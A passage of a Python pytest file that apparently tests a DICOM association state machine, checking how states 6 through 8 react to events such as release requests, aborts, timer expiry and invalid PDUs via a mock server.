('send', a_associate_ac),
('wait', 0.1),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt16']
def test_evt17(self):
"""Test Sta6 + Evt17."""
# Sta6 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta1']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt17']
def test_evt18(self):
"""Test Sta6 + Evt18."""
# Sta6 + Evt18 -> <ignore> -> Sta6
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.4),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt18']
def test_evt19(self):
"""Test Sta6 + Evt19."""
# Sta6 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt3', 'Evt19']
# Issue A-ABORT PDU
assert scp.handlers[0].received[1] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState07(TestStateBase):
"""Tests for State 07: Awaiting A-RELEASE-RP PDU."""
def test_evt01(self):
"""Test Sta7 + Evt1."""
# Sta7 + Evt1 -> <ignore> -> Sta7
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('request'))
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta7 + Evt2."""
# Sta7 + Evt2 -> <ignore> -> Sta7
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta7 + Evt3."""
# Sta7 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt3']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt04(self):
"""Test Sta7 + Evt4."""
# Sta7 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rj),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt4']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta7 + Evt5."""
# Sta7 + Evt5 -> <ignore> -> Sta7
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta7 + Evt6."""
# Sta7 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_associate_rq),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt6']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt07(self):
"""Test Sta7 + Evt7."""
# Sta7 + Evt7 -> <ignore> -> Sta7
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt7']
def test_evt08(self):
"""Test Sta7 + Evt8."""
# Sta7 + Evt8 -> <ignore> -> Sta7
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt8']
def test_evt09(self):
"""Test Sta7 + Evt9."""
# Sta7 + Evt9 -> <ignore> -> Sta7
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt9']
def test_evt10(self):
"""Test Sta7 + Evt10."""
# Sta7 + Evt10 -> AR-6 -> Sta7
# Evt10: Receive P-DATA-TF PDU from <remote>
# AR-6: Send P-DATA primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', p_data_tf),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
#primitive = self.assoc.dul.receive_pdu(wait=False)
#assert isinstance(primitive, P_DATA)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt10', 'AR-6'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt10']
def test_evt11(self):
"""Test Sta7 + Evt11."""
# Sta7 + Evt11 -> <ignore> -> Sta7
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt11']
def test_evt12(self):
"""Test Sta7 + Evt12."""
# Sta7 + Evt12 -> AR-8 -> Sta9 or Sta10
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AR-8: Issue A-RELEASE (rq) - release collision
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12']
def test_evt13(self):
"""Test Sta7 + Evt13."""
# Sta7 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rp),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
primitive = self.assoc.dul.receive_pdu(wait=False)
assert isinstance(primitive, A_RELEASE)
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt13']
def test_evt14(self):
"""Test Sta7 + Evt14."""
# Sta7 + Evt14 -> <ignore> -> Sta7
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt14']
def test_evt15(self):
"""Test Sta7 + Evt15."""
# Sta7 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU and start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt15']
def test_evt16(self):
"""Test Sta7 + Evt16."""
# Sta7 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_abort),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt16']
def test_evt17(self):
"""Test Sta7 + Evt17."""
# Sta7 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt17']
def test_evt18(self):
"""Test Sta7 + Evt18."""
# Sta7 + Evt18 -> <ignore> -> Sta7
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.3),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta6']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt18']
def test_evt19(self):
"""Test Sta7 + Evt19."""
# Sta7 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
]
scp = self.start_server(commands)
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta7']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt19']
# Issue A-ASSOCIATE, A-RELEASE, A-ABORT PDU
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState08(TestStateBase):
"""Tests for State 08: Awaiting A-RELEASE (rp) primitive."""
def test_evt01(self):
"""Test Sta8 + Evt1."""
# Sta8 + Evt1 -> <ignore> -> Sta8
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt1']
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta8 + Evt2."""
# Sta8 + Evt2 -> <ignore> -> Sta8
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta8 + Evt3."""
# Sta8 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_ac),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt3']
def test_evt04(self):
"""Test Sta8 + Evt4."""
# Sta8 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rj),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt4']
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta8 + Evt5."""
# Sta8 + Evt5 -> <ignore> -> Sta8
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta8 + Evt6."""
# Sta8 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', a_associate_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:5] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt6']
def test_evt07(self):
"""Test Sta8 + Evt7."""
# Sta8 + Evt7 -> <ignore> -> Sta8
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt7']
def test_evt08(self):
"""Test Sta8 + Evt8."""
# Sta8 + Evt8 -> <ignore> -> Sta8
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt8']
def test_evt09(self):
"""Test Sta8 + Evt9."""
# Sta8 + Evt9 -> AR-7 -> Sta8
# Evt9: Receive P-DATA primitive from <local user>
# AR-7: Send P-DATA-TF PDU to <remote>
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt12', 'AR-2'),
]
assert self.fsm._transitions[:4] == ['Sta4', 'Sta5', 'Sta6', 'Sta8']
assert self.fsm._events[:5] == ['Evt1', 'Evt2', 'Evt3', 'Evt12', 'Evt9']
def test_evt10(self):
"""Test Sta8 + Evt10."""
# Sta8 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('wait', 0.1),
('send', a_release_rq),
('send', p_data_tf),
('wait', 0.3),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
